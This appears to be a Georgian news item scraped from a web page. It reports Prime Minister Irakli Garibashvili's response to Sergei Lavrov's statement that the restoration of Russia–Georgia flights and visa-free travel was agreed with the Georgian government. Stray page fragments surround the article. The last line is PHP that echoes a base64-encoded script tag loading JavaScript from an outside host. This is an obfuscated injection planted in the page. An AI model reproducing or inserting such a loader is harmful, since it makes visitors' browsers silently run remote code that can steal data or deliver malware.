celsiusi
ავერსი საქკაბელი

პრემიერ-მინისტრი ირაკლი ღარიბაშვილი რუსეთის საგარეო საქმეთა მინისტრის განცხადებას პასუხობს. როგორც ღარიბაშვილი ამბობს, რუსეთმა ერთპიროვნულად მიიღო როგორც ფრენების აღდგენის, ისე უვიზო მიმოსვლის გადაწყვეტილება.

"მანამდე გაგახსენებთ რომ რუსეთის პრეზიდენტმა თქვა, რომ ეს იყო მისი ერთპიროვნული გადაწყვეტილება უვიზო რეჟიმის და ფრენების აღდგენა. დღეს რაც თქვა ბატონმა ლავროვმა ეს არის ფაქტის კონსტატაცია ანუ რა თქმა უნდა, მოხდა ამ შეთანხმების გაფორმება საქართველოს მთავრობასთან. კერძოდ, ეკონომიკის სამინისტროს საავიაციო სააგენტო ბუნებრივია თანხმობას აძლევს შესაბამის უწყებას და შესაბამის რუსულ კომპანიებს. ამ შეთანხმებაზეა საუბარი და რა არის ამაში გაუგებარი?! რა სკანდალი ნახეთ ამაში?! რა აღმოაჩინეთ?! მანამდე თქვენ მოისმინეთ რუსეთის პირველი პირის განცხადება, რომ ეს იყო ერთპიროვნული გადაწყვეტილება.დღეს რაც გაკეთდება განცხადება არის ფაქტის დადასტურება იმის, რომ მთავრობასთან შეთანხმება მოხდა. ჩვენ ეს ფარულად არ გაგვიკეთებია. მას შემდეგ, რაც ხელისუფლებამ თქვა, რომ ფრენებს აღადგენს და უვიზო რეჟიმს დაუწესებს ჩვენს მოქალაქეებს ჩვენ ამას მივესალმეთ და ვთქვით, რომ ეს კარგი ნაბიჯია. ასევე ვთქვით, რომ მხოლოდ არასანქცირებული კომპანიები და თვითმფრინავები იფრენდნენ", - აცხადებს ღარიბაშვილი.

დღეს რუსეთის საგარეო საქმეთა მინისტრმა განაცხადა, რომ რუსეთ-საქართველოს შორის ფრენების აღდგენა და სავიზო რეჟიმის გაუქმება საქართველოს მთავრობასთან შეთანხმებული იყო. როგორც სერგეი ლავროვი Tass-თან ინტერვიუში აღნიშნავს, თბილისის ამჟამინდელი ხელისუფლება რუსეთთან ურთიერთობების ნორმალიზებით დაინტერესებულია.

640
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");